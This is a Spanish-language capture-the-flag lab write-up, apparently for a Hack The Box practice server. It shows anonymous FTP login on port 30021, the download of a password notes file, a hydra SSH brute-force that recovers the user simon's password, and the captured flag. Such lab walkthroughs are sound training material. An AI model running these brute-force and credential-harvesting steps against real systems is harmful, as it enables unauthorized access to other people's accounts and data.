El segundo servidor es un servidor interno (dentro del dominio inlanefreight.htb) que administra y almacena correos electrΓ³nicos y archivos y sirve como respaldo de algunos de los procesos de la empresa. De conversaciones internas hemos oΓdo que esto se utiliza raramente y, en la mayorΓa de los casos, hasta ahora sΓ³lo se ha utilizado con fines de prueba.
Encontramos 5 puertos abiertos, y vemos que en este host el servicio FTP se ejecuta en el puerto 30021 en vez del puerto 21 que se suele utilizar para FTP.
30021/tcp open ftp
Acceso a FTP
Probamos a acceder con login anonymous y conseguimos acceder correctamente:
Al enumerar los archivos encontramos una carpeta simon, que es el ΓΊnico usuario de este sistema, y encontramos un archivo de notas que vamos a descargar en local:
El archivo mynotes.txt contiene lo que parecen contraseΓ±as para acceder al sistema:
Entonces ya tenemos el usuario simon y la lista de contraseΓ±as, por lo que vamos a hacer bruteforce al servicio SSH para ganar acceso al servidor.
Bruteforce de SSH
Buum! Obtenemos la contraseΓ±a del usuario simon para acceder por SSH
Acceso por SSH
Conseguimos acceder correctamente y nos hacemos con la flag!
afsh4ck@kali$ ftp 10.129.14.176 30021
Connected to 10.129.14.176.
220 ProFTPD Server (Internal FTP) [10.129.14.176]
Name (10.129.14.176:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls
229 Entering Extended Passive Mode (|||59483|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 ftp ftp 4096 Apr 18 2022 simon
226 Transfer complete
ftp> cd simon
250 CWD command successful
ftp> ls
229 Entering Extended Passive Mode (|||50226|)
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 ftp ftp 153 Apr 18 2022 mynotes.txt
226 Transfer complete
ftp> get mynotes.txt
local: mynotes.txt remote: mynotes.txt
229 Entering Extended Passive Mode (|||42036|)
150 Opening BINARY mode data connection for mynotes.txt (153 bytes)
100% |***************************************| 153 209.55 KiB/s 00:00 ETA
226 Transfer complete
153 bytes received in 00:00 (2.49 KiB/s)
ftp>
afsh4ck@kali$ hydra -l simon -P mynotes.txt -f 10.129.14.176 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-06 19:19:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:1/p:8), ~1 try per task
[DATA] attacking ssh://10.129.14.176:22/
[22][ssh] host: 10.129.14.176 login: simon password: 8Ns8j1b!23hs4921smHzwn
[STATUS] attack finished for 10.129.14.176 (valid pair found)
ssh simon@10.129.14.176
Last login: Wed Apr 20 14:32:33 2022 from 10.10.14.20
simon@lin-medium:~$ ls
flag.txt Maildir
simon@lin-medium:~$ cat flag.txt
HTB{1qay2wsx3EDC4rfv_M3D1UM}
